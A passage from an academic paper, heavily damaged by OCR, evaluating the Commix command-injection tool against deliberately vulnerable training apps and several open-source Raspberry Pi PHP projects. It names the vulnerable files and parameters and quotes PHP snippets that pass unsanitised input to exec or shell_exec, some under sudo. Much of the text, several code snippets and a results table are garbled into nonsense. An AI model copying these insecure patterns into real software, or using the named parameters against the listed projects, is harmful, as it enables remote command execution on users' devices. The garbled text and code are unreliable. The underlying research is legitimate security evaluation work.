(DVWA)[30] is a free, open- source PHP/MySQL Web application that supports three different security levels, low, medium and high. The low level is meant to simulate @ website with no security at al: the medium level is meant to simulate a website that applies input validation, but still vulnerable; while the high level is meant to be secure and cannot be exploited. In low security level, Commix successfully identified and exploited classic result-based, time-based blind and file-based semiblind com- mand injection vulnerabilities. Subsequently, in the medium security level, although some security measurements were applied (ie., characters blacklisting), Commix was able to exploit the vulnerable application via classic resull-based, time-based blind and file-based semiblind command injec- tion attacks. All the vulnerabilities were identified in the “ip” POST parameter of “vulnerabilities/exec/”. Finally, it is worth noting that in the high security level, Commix did not detect any vulnerability as expected, because this level is not meant to be exploitable. Extremely buggy Web app (bWAPPI[31] includes two Web applications vulnerable to command injections. Similarly to DVWA, DWAPP also supports three different security lev- els, low, medium and high, which range from completely vulnerable to secure. In the first Web application, in the low security level, classic result-based, time-based blind ‘and file-based semiblind exploitable command injection vul- nerabilities were successfully identified. Moreover, in the ‘medium security level, although some security measure- ments were applied (i.c., characters blacklisting), Commix detected classic result-based, time-based blind and file-based semiblind exploitable command injection vulnerabilities, The vulnerabilities were discovered in the “target” POST parameter of “commandi php” page. On the other hand, in the second Web application, in both low and medium security level, only time-based blind and file-based semib- lind command injection vulnerabilities were identified. The ‘vulnerabilities of the second challenge were discovered in the “target” POST parameter of the “commandi_blind php’ page. It is worth noting once again that in the high security level Commix did not detect any exploitable vulnerability. OWASP Matilde I[32] isa Stee, open-source, deliberately ‘vulnerable Web application. As previously, OWASP Mutil- lidae includes three different security levels, low, meditm and high. In low security level, Commix identified classic result-based, time-based blind and file-based semiblind com- ‘and injection vulnerabilities. Inthe medium security Teel, although some security measurements were applied (.e., characters blacklisting), Commix was able to expoitthe vule nerable application via classic result-based, time-based blind and file-based semiblind command injection attacks. All the ‘vulnerabilities were found in the “target_host” POST param- cter of “dns-lookup php". Once again in the high security level, Commix did not detect any exploitable vulnerability Pentester Labj33] has an exercise named Web for Pen- tester, which includes three Web applications with command injections vulnerabilities. Commix was able to detect these vulnerabilities in the “ip” GET method parameter. Command-InjectiontSO (Pentester Academy)[34] is a col- lection of ten preinstalled real-world vulnerable applications, ‘Commix, identified and exploited the following applications. Basilic 15.14", “AjaXplorer 2.6", "PHPTax 08”, “PHP. D springer A. Stasinopoules tal x - x x qd gadcoqey> x x x x yb soRuote4s x x x x qt yaSeaqeq> x x x x iuateys x x x x qe za802qe92 x x x x ay s8u2q E49 x x x x Buus" atur gd oaSu2qe4> He CHONO x x - x owe SyuosymyXWouDeCHHoNs we sour, x - x x - Homous oss Targa - - x - ond gdp oe swomoT x - aa yeaa oT sma ana x x - ~ ompd gdp so sata x x - x sans! ad ese paN? se smmrdxely x x - x Pre dan x x - x wo axe x x - x om gasp erst oma x x nd garda - - - x age zayiexs x x - x adeno spysong 203 gong eT MIS x x - x cumpayy ow 23m aye ényooy-sup x x - x wor soir ey ye dny0or SP 1 >eprtmnny aS¥MO x x oie) {gd pong parents x x - - vein gd pay x x - x amy qdyprwaraos x x - x ite agdrparmes — (gayyag) woneande gay, rowpomrg-pa x x - ~ ams gds0)our SABAOHIOGE x x - - pu dydronuoapmnayreauoss96g.2571 snort x x - - paws gd pus" oeeoscar arypay, x x - x soap yen rowenta x x - x nd gd oust someuoqemmneey x x proassed piss avons" yowonnsy so9ps09iea Powgerd _pORqaWRL __uORERTEARaP=D sREEUKG pose pu aGEUTA oo Springer as A. Stasinopoules tal takes arguments through the “input” GET parameter (as shown in the code snippet below). Commix detected that the venerate php” page is vulnerable to time-based blind and file-based semiblind command injection attacks. scat Tt input") RpilRRemot[39] is a free and open-source application that allows a user to control its TV/TVbox by smartphone and Raspberry Pi. Commix detected that RpiIRRemote is prone to command injection vulnerabilities in the “izphp" file ‘More specifically, the “irphp” file is taking the device name and a command as arguments through the “device” and ‘cmd” GET or POST parameters, respectively, as shown in the code snippet below. Then, it executes the “irsend” com mand (.¢., to sendiinfrared commands) followed by the name ‘of the device and the desired command. Both parameters (i.., device, cmd) were identified tobe vulnerable to classic result- based, time-based blind and file-based semiblind command injection attacks F(Gemaae Sdevice) ( Somdline = "irsend SEND_ONCE *, $device +. Send ; echo (Sendline); Soutpur = shell_exec(Sendiine); echo Soutput) $output = #hell_exec{Sendline); ecko (5. Red’ Alert[40] is an open-source notification system for the Microsoft PowerBI [41], where the main controller runs ‘on a Raspberry Pi. Commix discovered that it is prone to command injection vulnerabilities in the “missile/mis- sile_emd php” file. More specifically, the “missile/mis- sile_emd.php" file is taking a command (Le., tight, left, up, down, fire, sleep, park, led) and a value as arguments, ‘through the “cmd” and “val” GET parameters, respectively, as depicted in the code snippet below. Then, via Yexce()” PHP function, the main “missile py” python scriptis executed, fol- lowed by the desired command and a value, Both parameters Ge., cmd, val) were identified tobe vulnerable to time-based blind and file-based semiblind command injection attacks that allow an attacker to execute arbitrary commands on the targethost system, with root privileges, since the “sudo” com rand is preceded, Soma = SORT vena") Sval = S_oRT[7val’} exec(*eudo python migeile.py send ¢val D Springer UGHT{42] is an open-source project which uses a Rasp- berry Pi with relays to control lights from a Web interface ‘or from an android application. Comix discovered that this application is prone to command injection in “LIGHTserver/- vvar/www/control.php” file. More specifically, this file takes ‘command through the “cmd” GET parameter, as presented in the code snippet below. After that, via “exec()” PHP func- tion, the desired commands executed. The “cmd” parameter identified (o be vulnerable o time-based blind and file-based semiblind command injection attacks, allowing an attacker to execute arbitrary commands with root permissions, scone RobotRoverV5[43] is an open-source project for an ardiuino robot with DFRobottomeo and distance sensor on servo. fier the audits we performed against “RobotRoverVS application, Commix discovered that itis prone to command injection vulnerabilities in “motorphp” file, More specifi cally, the “motor php” file takes the value ofthe state variable through the “state” GET parameter, as shown in the code snippet that follows. Depending on the state which is speci- fied by the uses, a predefined command and a predefined state are combined and executed via the “exec()” PHP function. Asin the previous cases, the “state” parameter was identified tobe vulnerable to time-based blind and file-based semiblind ‘command injection attacks. Sstate = s_cerl f($stace == 3)¢ Send = ‘sudo /ete/init.a/dire_aute Sstal exec (Fond sstatens elseif(sstace == 2)( fom sudo /ete/init.a/dire_auto "; exes (Send ate): Sema = "sudo python /var/ www dire_manual.py *"; getace = "19"; exec (Send .$atate): dire_manual py"; exec (send. sacace} EEG-Based-BCI[44] is an open-source project to obtain EEG. (electroencephalogram) signals from a neuroheadset and process the subsequent data produced for classification Commi automating evaluation and exploitation of command injection vulnerabilities in Web, ‘of objects, Commix discovered that it is prone to com ‘mand injection vulnerabilities in “eallScripts.php" file, More specitically, che “callSeripts.php” file takes a label through the “label” POST parameter, as depicted in the code snippet below. Next, via“shell_exec()” PHP function, the “main bat’ script is executed, which in turn it executes the “main.py” python script, followed by the “label” POST parameter. The “label” parameter is not sanitized, and therefore, the applica- tion was identified to be vulnerable to time-based blind and file-based semiblind command injection attacks (empty ($_Post (‘Label "})} shell_exec{"start end /k code\\main.bat Cl\\python27\python. exe") exec { "start ema /k code\\main.bat Cu\\Python27 \python exe * tabel']): s Post [” irace[45] is an open-source Web traceroute utility, which finds out the route taken by packets across an IP network, ‘Commix discovered that the “iTrace” application is prone to command injection in “waceroute php” file. To be more specific, the “traceroute.php" file is taking the maximum ‘number of hops and the hostname as arguments through the ‘nops” and “host” POST parameters, respectively, as shown, in the code snippet that follows, Then, via the “exec()” PHP function, the “traceroute -m” command is executed, which is used fo set the max number of hops. Both parameters (hops, host) were identified to be vulnerable to classic result-based, time-based blind and file-based semiblind command injec- tion attacks. fa = array Semd = ‘traceroute -m 1.11. Spost(*h exes (Send, Sal reach ($a AS Sx) echo *$rebr/>* POST I ‘hops’ sree os ‘wsn-ip-interoperability[6) is an open-source application to ‘reate wireless sensor networks. This application is vulner- able in the “web/script/action.php” file. To be more specific, the “web/scriptaction php” file is taking three of GET parameters “status”, “relay” and “atmy” as arguments (see in the code snippet below). Via “exec” PHP function, the application executes the “xbee.py” python script, followed by the aforementioned commands. All parameters (status, relay, atmy) were identified to be vulnerable to time-based blind and file-based semiblind command injection attacks. SLORT[’ status"); s_GET['relay’]; s_Get{'atmy']: "python /root/xhee. py gat exec (Scommand) ve Satmy . 1". Srelay raspberry-pi-camera-control-phpl7]is an open-source appli- cation that helps the user to control a Raspberry Pi camera ‘module via Apache server and PHP. Commix detected vul- nerabilites in the “stil. php" file. To be more specific, the “stil. php” file takes several GET parameters as arguments {as shown in the code snippet below), followed by the “raspis- 1ill -nopreview -o /opttemphest01 jpg” command, whi ‘generates an image according to the characteristics entered by the user. The above command is assigned to a “Scom- mand” variable. Then, the “command” variable is escaped (see Sect. 7) by using the “escapeshellemd()” PHP func- tion, creating another variable named “Sescaped_command ‘The application, instead of using the escaped variable (Ge. Sescaped_command), it erroneously uses the unescaped (i. ‘Scommand) as argument in the PHP function, mak- ing il vulnerable (o classic result-based, time-based blind and file-based semiblind command injection as Commix detected. SGonmand = ‘raspistill --nopreview -o yopt/temp/test0l. jpg '.$quality Swidth. height . $verbose. $timeout Sencoding. $timelapse.Ssharpness Scontrast . $saturation. $180. svatab Sev. Sexposure. favb.$inxix. $coltx §netoring. $rotation. $hflip.svflip.* aeer* Sescaped_conmand = escapeshellema( $command} exec{scommand, Stest, §retval); wp-plugin-grunt[48} is a free and open-source wordpress plugin to manage the user's project using grunt. Commix detected that the application is vulnerable to classic result- based, time-based blind and file-based semiblind command injection in the “wp-plugin-grunt php” file. In particular, the ‘wp-plugin-grunt php” file takes a command through the ‘command” POST parameter, as presented below. After that, vvia “shell_exec()” PHP function, the desired command is executed. fanesion my_action_callback 0) ¢ global Swpab ia is how you ge Senvironment ost [env sres shell_exec ( pment "1; onge S_P0ST |‘ command y D springer A. Stasinopoules tal senv ronmen Sresponse on( ‘extra_post_inte’ } Linux-webui[49] is an open-source simple Web control panel forLinux servers. Commix discovered that itis prone to clas- sic resull-based, time-based blind and file-based semiblind ‘command injection attacks in “shellscripts/catile,php" file ‘To be more specific, the “shellscripts/eatile php” file takes a file as argument through the “file” GET parameter (as shown below) and then, via the “shell_exec)” PHP function, the at” command is executed, which is used to output the con- tents of a specific file. © (iesect stile echo cer(sfite})) ¢ ‘file’ shell_exec ("eat “.stiter.* SMRTHAUS[50] is a free and open-source home automa tion platform that rans on Rasberry Pi and allows for a customizable home automation. Commix detected vulner- abilities in the ‘remove. device php” file, More specifically, the “remove_device php” file takes a device name through the “deviee” POST parameter, as shown in the code snip- pet that follows. After that, via “exec” PHP function, the “remove_device.py” python script is executed, which removes a desired device, followed by the device name. The ‘device” parameter was identified as vulnerable to classic result-based, time-based blind and file-based semiblind com- ‘mand injection attacks. $file = fopen(*remove_iog.txt fwrite($fiie, $_post(*device I}; close (stile); echo exec (‘python renove_device py s_vost [*device"]) ‘Wake-on-LANis an Bthernet networking standard that allows a server to be turned on by a network message. The wake- ‘omLAN plugin [51] allows a user to scan a network, add, save and delete computers from it, After the audits we performed against the wake-on-LAN plugin, Commix discovered that it is prone to command injection vulnera- bilities on “include/wake php” file. To be more specific, the “include/wake php” file is taking the network interface and the mac address, as arguments, through the “ifname” and D Springer “mac” POST parameters, respectively, as shown in the code snippet that follows. Then, it executes the “etherwake -i command, which is used to send a Wake-On-LAN “Magic Packet” under Linux OS. Both parameters (i.,ifsame, mac) ‘were identified to be vulnerable on time-based blind and file- based semiblind command injection attacks. Sconmand = "etherwake -i *.$_posTI" ifnane* SPOS [ "mae" Ty exec (Scommand) + ‘Changeling|52} is open-source application that is described fas a network security drop box. The command injection vulnerabilities were found in PHD files “/princesspi/D! Detectiverexec/exec_ping php" and “/princessp/DNSDetec- tivelexec/exec._ traceroute php”. More specifically, inthe case of the “exec_ping.php” file, as depicted in the code snip- pet below, the application executes a ping operation via the “exec()” PHP function, while taking the host's name or IP as arguments through the “domain” POST parameter. ‘The execution’s resulls were printed using the PHP fune- tion, “print_1)” [53]. Thus, we successfully identified classic esult-based, time-based blind and file-based semiblind com- ‘mand injections on the “domain” POST parameter of the “exee_ping php" file f($_post(*domain’)) exec{*ping -e 4 ($_POST[’domain’]}", Soutput, Sstacus); print_r(Seutpath; Regarding the “exec_traceroute php" file, the application executes a traceroute operation through the “exec()” PHP function (see in the code snippet that follows), while taking the hostname as an argument via the “domain” POST param- ter. After that, it stay silent for 15s and finally, by using the "print_rQ” [53] PHP function, the execution’s results are printed back, Using Commix, we successfully identified clas- sic result-based, time-based blind and file-based semiblind command injections on the “domain” POST parameter of the “exee_ping php” file.

You might also like